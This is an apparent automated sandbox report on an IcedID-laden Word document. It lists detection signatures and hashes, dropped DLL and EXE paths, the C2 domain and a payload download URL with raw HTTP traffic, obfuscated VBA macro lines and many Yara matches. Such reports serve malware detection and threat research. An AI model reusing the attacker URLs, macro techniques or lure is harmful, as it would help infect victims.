Windows Analysis Report
dodsonimaging,file,08.11.2022.doc

Overview

General Information

Sample Name: dodsonimaging,file,08.11.2022.doc
Analysis ID: 682555
MD5: db11828aed458eccfab30c367bc1bb2f
SHA1: 3487931f130485c82d21e9ef4155af0a8fd46c33
SHA256: d297f78ca4fc35e899792260c98f752947f7d6b5999650a6210f4a8538a2e655
Tags: docIcedID

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Yara detected IcedID
Submitted sample is a known malware sample
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: dodsonimaging,file,08.11.2022.doc Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll Avira: detection malicious, Label: HEUR/AGEN.1251556
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll Avira: detection malicious, Label: HEUR/AGEN.1251556
Source: Yara match File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
Source: dodsonimaging,file,08.11.2022.doc Joe Sandbox ML: detected
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D2CCA CryptCreateHash, 5_2_000007FEF74D2CCA
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D2CDA CryptCreateHash, 5_2_000007FEF74D2CDA
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D2CF7 CryptCreateHash,CryptAcquireContextW, 5_2_000007FEF74D2CF7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
Source: global traffic DNS query: name: alexbionka.com
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80

Networking

Source: C:\Windows\System32\rundll32.exe Network Connect: 64.227.108.27 80
Source: C:\Windows\System32\rundll32.exe Domain query: alexbionka.com
Source: Malware configuration extractor URLs: alexbionka.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com
Source: Joe Sandbox View IP Address: 64.227.108.27 64.227.108.27
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Aug 2022 15:27:53 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34X-Powered-By: PHP/7.2.34Content-Description: File TransferContent-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n152.dll"Expires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: GET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 15:28:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: rundll32.exe, 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146
Source: r8F8A.tmp.exe, 00000004.00000002.947212998.0000000000544000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO651
Source: rundll32.exe, 00000005.00000002.946500904.0000000000134000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm&
Source: rundll32.exe, 00000005.00000002.946524016.0000000000420000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rm
Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT&
Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rma
Source: r8F8A.tmp.exe, 00000004.00000002.947197812.0000000000360000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmj
Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmli
Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv&
Source: rundll32.exe, 00000005.00000002.946611241.0000000000504000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://alexbionka.com/
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4221A912-2B82-4834-A4D3-95CF1F77F776}.tmp
Source: unknown DNS traffic detected: queries for: alexbionka.com

E-Banking Fraud

Source: Yara match File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

System Summary

Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: Screenshot number: 4 Screenshot OCR: "Enable editing" button on the top bar, and then click "Enable content".
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Dropped file: MD5: 51138beea3e2c21ec44d0932c71762a8 Family: APT29 Alias: Cozy Bear, Cozy Duke, The Dukes, Dukes, Group 100, CozyDuke, EuroAPT, CozyBear, CozyCar, Cozer, Office Monkeys, OfficeMonkeys, Minidionis, SeaDuke, Hammer Toss, APT29 Description: APT29 has operated since at least 2008 and has been attributed to the Russian government in public reports. It is regarded as a well-resourced, highly dedicated, and organized cyber-espionage group that collects intelligence in support of foreign and security policy decision-making. References: https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf ; https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf ; https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ ; https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/ ; https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf ; https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf ; https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
